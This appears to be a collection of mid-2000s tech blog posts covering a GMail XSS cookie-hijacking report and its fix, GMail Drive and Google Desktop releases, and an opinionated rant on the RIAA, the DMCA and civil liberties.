Well, you have to give Google credit. They certainly turned this one around quickly. Per my post yesterday evening:

An Israeli publication, Nana Net Life, broke the news that a simple XSS exploit can be used to gain access to your GMail account. The exploit was not explained specifically but in the most general terms, it seems that a hacker hijacks your GMail cookie when you follow a special link that has been setup to grab your cookie. Once your cookie is captured, a hacker then has access to your GMail account and changing your password has no effect. Workarounds? I think that not checking the autologin for 2 weeks button will safeguard your account.

According to InfoWorld, Google has now fixed the problem. [via InsideGoogle via theunofficialgoogleweblog]

In case anyone is interested, the official GMail bug list is available from Google here.

Well, not exposed in detail, but rather announced. An Israeli publication, Nana Net Life, broke the news that a simple XSS exploit can be used to gain access to your GMail account. The exploit was not explained specifically but in the most general terms, it seems that a hacker hijacks your GMail cookie when you follow a special link that has been setup to grab your cookie. Once your cookie is captured, a hacker then has access to your GMail account and changing your password has no effect. Workarounds? I think that not checking the autologin for 2 weeks button will safeguard your account.

Update: The exploit involves a XSS exploit. You can read more about XSS exploits here via Whovian commenting on a Slashdot article regarding the bug.

Google is reported to be working resolve the security bug as quickly as possible.

Here’s a neat little PHP script courtesy of Paul Shapiro that will generate a PNG file advertising the number of GMail invites in your account. Perfect for impressing all the GMail groupies in the forums.

Source: GMail Invite Sig

This new feature of GMail has popped up over the past week and it is really annoying me.

Warning: This message may not be from whom it claims to be. Beware of following any links in it or of providing the sender with any personal information.

Movable Type sends me a note when someone leaves a comment and I have a link built into the note that allows me to quickly delete a comment or trackback ping if it is SPAM. The problem is that these emails are sent from my server as the user that leaves the comment and GMail notes this and disables all links in the email to “protect me.” Interestingly, the phishing detection does not trip on all the comment notifications sent from my server.

What we need is a REMOVE PROTECTION link in the same vein as the Display External Images link for emails that reference remote graphics. Even better, give me the ability to turn PHISHING detection off.

Today I noticed that the status of my ipod order has changed to: Sent to Vendor, Waiting on Product. Looks like it will be arriving shortly.

I am currently working on the freeflatscreens.com offer. You can read more here.

GMail Drive 1.02 has been released. Per Bjarke, the new features include:

* “Send To” context menu
* Option to preserve filenames in attachments
* Option to use HTTPS only (secure)
* Cookies don’t interfere with GMail Notifier
* Proxy authentication support
* Several bugfixes

Bjarke also stated:

The new options are available in the Login dialog under the “More” button. It’s necessary to uninstall, reboot and reinstall - to replace the old version.

I encourage you to read the many comments and the summary before posting about something being broken: GMail Drive page. Most user issues have been documented and addressed already.

Google has released Google Desktop - search for your Windows desktop. Results are presented in the traditional Google fashion using a web page but the data does not traverse the Internet. GD indexes common files such as Word, Excel, Powerpoint, plain text, HTML, and Outlook mail. GMail is not currently integrated.

Because of the presentation method it is a sure bet that AdWords will be integrated into the search results page real soon now.

See the announcement here.

Get the code from Google here.

Read a review at Search Engine News

The Supreme Court refused to hear RIAA pouting over a lower court decision that overturned a portion of the DMCA the RIAA was using to unconstitutionally capture ISP user information. Now they have to file proper John Doe suits.

/rant on

We are truly blessed that we have organizations like the EFF, the ACLU, and the IJ to protect our rights. Sure, there have been times in the past when even I questioned some of the ACLU’s crusades but having now lived through the Patriot Act, the DMCA, and the current intellectual property war I realize that in calmer times you need to push the balance to the extreme. In this manner, we lose less in times such as these. Plus, then the infrastructure and the coffers exist to defend our liberties and rights when our liberties most need defending. Give often and give generously to these organizations. While you may disagree with one or another of their positions, the really do serve the greatest good - liberty.

To say that you don’t mind giving up a “little” of your liberty to live in a safer America is doing a great disservice to many millions of patriots that have given their lives for our freedoms. The reality is you will not be safer but you will be giving a victory to the terrorists. I would die for my freedoms - and yours. Can you say the same?

/rant off

Uh… doesn’t this defeat the purpose of all those really expensive satellites? XM has announced XM Satellite Radio Online coming to a computer near you this month. At $7.99 I’d say there is some serious profit in there. $3.99 if you are a current XM subscriber. Of course, the XM PCR had these bases covered until XM caved to RIAA pressure. Fair use and technical innovation be damned. Good thing Tivo isn’t filled with spineless wussies.